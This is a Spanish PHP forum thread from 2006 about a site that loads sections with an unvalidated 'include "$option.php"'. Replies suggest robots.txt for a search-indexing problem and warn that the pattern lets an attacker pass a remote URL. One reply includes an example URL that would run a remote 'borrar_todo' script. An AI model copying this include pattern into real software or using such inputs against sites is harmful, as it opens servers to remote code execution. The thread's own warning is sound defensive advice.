Foros del Web » Programando para Internet » PHP »

Buscadores e includes

Estas en el tema de Buscadores e includes en el foro de PHP en Foros del Web. Hola, Tengo una web hecha en php en cuya página principal y dentro de un div he colocado el siguiente código: Código PHP: <?php   ...
  #1 (permalink)  
Antiguo 02/01/2006, 13:44
 
Fecha de Ingreso: diciembre-2003
Mensajes: 49
Antigüedad: 14 años
Puntos: 0
Buscadores e includes

Hola,
Tengo una web hecha en php en cuya página principal y dentro de un div he colocado el siguiente código:
Código PHP:
<?php
 
if ( !isset( $option ) )
 {
 
$option="portada";
 }
include 
"$option.php";
?>
Las secciones de la página se cargan en el index por medio de
Código PHP:
index.php?option=portada 
El problema de este método es que al hacer una búsqueda en el google u otro buscador ocurre algo parecido a tener una página con frames. El buscador encuentra la página por ej. contacto.php y cuando pincho muestra sólamente la sección contacto pero sin mostrar el resto de la página (cabecera, pie, menú de navegación, etc). No sé si me explico.

¿Habría alguna forma de hacer que se apareciese todo?

Gracias de antemano
  #2 (permalink)  
Antiguo 03/01/2006, 00:56
 
Fecha de Ingreso: octubre-2005
Mensajes: 407
Antigüedad: 12 años, 2 meses
Puntos: 2
puedes usar un archivo robot.txt para que no te incluya los buscadores las paginas a las que apunta el include
saludos
  #3 (permalink)  
Antiguo 03/01/2006, 03:48
 
Fecha de Ingreso: diciembre-2003
Mensajes: 49
Antigüedad: 14 años
Puntos: 0
Gracias por tu respuesta DJJJ.
No tengo ni idea de como hacer lo que dices, podrías orientarme un poco?
Gracias mil
  #4 (permalink)  
Antiguo 13/01/2006, 09:56
 
Fecha de Ingreso: octubre-2005
Mensajes: 407
Antigüedad: 12 años, 2 meses
Puntos: 2
disculpa amigo vi tarde tu post

usar un archivo robot es muy facil para decirle al buscador que debe indexar y que no

un ejemplo de mi archivo robot es el siguiente

User-agent: * (para todos los robot)
Disallow: /archivos/ (dice que no queremos que indexe el directorio archivos

Disallow: external.htm (que no indexe el este archivo)
Disallow: externalnew.htm


entonces lo que debes hacer es armar un archivo robot
para ello
crea un archivo llamado robot.txt

y pones lo siguiente modificandolo a tu necesidad con los directorio que no quieras que indexes, no te vallas a confundir y le dices que no indexe a un archivo que en realidad querias que indexara o sea que este en el buscador

Código:
User-agent: *
Disallow: /flash/
Disallow: /mensajes/
Disallow: /tagboard/
Disallow: /votar/
Disallow: pagina2.htm
Disallow: paginaframe.htm

cualquier cosa me dices
__________________
DJJJ
  #5 (permalink)  
Antiguo 13/01/2006, 17:28
 
Fecha de Ingreso: diciembre-2003
Mensajes: 49
Antigüedad: 14 años
Puntos: 0
No te procupes djjj
Gracias por tu solución
  #6 (permalink)  
Antiguo 13/01/2006, 18:56
 
Fecha de Ingreso: enero-2006
Ubicación: Buenos Aires, Argentina
Mensajes: 299
Antigüedad: 11 años, 11 meses
Puntos: 5
Siento que me estoy volviendo un poco latoso porque ya lo dije un par de veces hoy, pero hacer un include de esa manera es MUY inseguro.

Código PHP:
if ( !isset( $option ) )
 {
 
$option="portada";
 }
include 
"$option.php"
Cualquiera podría poner en la barra de direcciones del navegador 'www.tusitio.com/index.php?option=http://www.sitio_tal.com/borrar_todo y el resultado de tu include sería:

include "http://www.sitio_tal.com/borrar_todo.php";

Estarías EJECUTANDO en tu sitio el código php borrar_todo que está en el sitio de un eventual atacante que, en muchas de las configuraciones de php, sólo necesita un línea de código para borrarte todos los archivos que haya en tu sitio. O para hacer lo que le de la gana al que quiera atacar tu sitio.

Acá explican tangencialmente el problema y cómo evitarlo.

http://www.zonaphp.com/creando-webs-modulares/2/

Creo que es algo para tomar muy en cuenta.

Suerte
Califa
  #7 (permalink)  
Antiguo 13/01/2006, 19:51
 
Fecha de Ingreso: diciembre-2003
Mensajes: 49
Antigüedad: 14 años
Puntos: 0
Voy a leérmelo de arriba a abajo mil gracias amigo!
  #8 (permalink)  
Antiguo 13/01/2006, 20:10
 
Fecha de Ingreso: enero-2006
Ubicación: Buenos Aires, Argentina
Mensajes: 299
Antigüedad: 11 años, 11 meses
Puntos: 5
No hay de qué. Y si te quedan dudas o inquietudes después de leer el artículo, plantealas acá en el foro. Seguramente, mucha gente podría aportar sobre el tema y muchos se podrían/nos podríamos beneficiar con esos aportes. Me da la impresión de que muchas veces, ciertas vulnerabilidades/problemas de seguridad son fácilmente evitables.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 04:31.